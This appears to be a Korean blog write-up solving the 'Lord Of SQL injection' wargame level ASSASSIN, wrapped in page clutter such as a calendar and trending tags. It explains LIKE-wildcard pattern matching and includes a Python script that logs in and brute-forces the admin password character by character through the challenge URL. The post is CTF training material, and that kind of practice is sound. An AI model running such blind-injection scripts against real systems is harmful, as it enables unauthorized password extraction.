일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
Tags
- 임영규
- 이태원 클라쓰 15회 예고
- 킹덤 고근희
- 폰폰테스트
- 은혜의 강 교회
- 뭉쳐야 찬다
- 제넥신
- 학교 개학 연기 4월
- 고민정
- 성남은혜의강교회
- 불가피
- libtins
- 스콜피온킹
- 미국 금리인하
- 이상형 만들기
- 해킹
- 양적완화
- 김재석
- 김영권
- 최강욱
- 금리인하
- 스페인 코로나
- 홍혜걸
- 조희연
- 유튜버 김재석
- 김영권 아내
- 성남 코로나 확진자
- 픽크루
- 리리남매
- 이지혜
Archives
- Today
- Total
Dork's port
LOS 15번 ASSASSIN 본문
이번 문제는 LIKE를 이용한 문제네요!
LIKE는 = 과는 다르게 와일드카드를 이용할 수 있다는 점이 있습니다.
따라서 저는 패턴 검색을통해 x* xx*과 같이 맞는 패턴을 하나씩 찾아 나가기로 했어요.
LIKE에서는 %을 붙이면 와일드카드
*와 같은 효과를 나타냅니다.
그래서 저는 Python을 이용해 코딩을 했습니다.
이때 Guest와 Admin이외에 계정은 없다고 먼저 산정하고 코드를 짰는데 운좋게 걸려든 것 같네요.
추후 시간이 된다면 탐색 알고리즘을 생각해서 다시 짜보고 싶은 문제였습니다 :)
from bs4 import BeautifulSoup import requests def login(id, pw): url = 'https://los.rubiya.kr/?login' data = {'id': id, 'pw': pw} res = requests.post(url, data=data) if res.status_code != 200: print('Please check server status.') exit(1) if res.text.find('fail') != -1: print('Please check your id or pw') exit(1) print('Login Success!') return res.cookies.get_dict() cookie = login('d0rk','d0rkd0rk') pw_list=list() url = 'https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=' while True: sub_pw=list() for i in range(0, 10): res = requests.get(url + str(i)+'%25', cookies=cookie) soup = BeautifulSoup(res.text, 'html.parser') h2s = soup.find_all('h2') if h2s: for h2 in h2s: if h2.text.find('Clear') != -1: print('Clear This Stage! ') pw_list.append(i) print(pw_list) exit(0) else: print(i) sub_pw.append(i) pw_list.append(sub_pw.copy()) url += str(sub_pw.pop())
'Lord Of Sql injection' 카테고리의 다른 글
LOS 17번 SUCCUBUS (0) | 2019.01.12 |
---|---|
LOS 16번 ZOMEBIE_ASSASSINE (0) | 2019.01.12 |
LOS 14번 GIANT (0) | 2019.01.12 |
LOS 13번 BUGBEAR (0) | 2019.01.12 |
LOS 12번 DARKKNIGHT (0) | 2019.01.12 |
Comments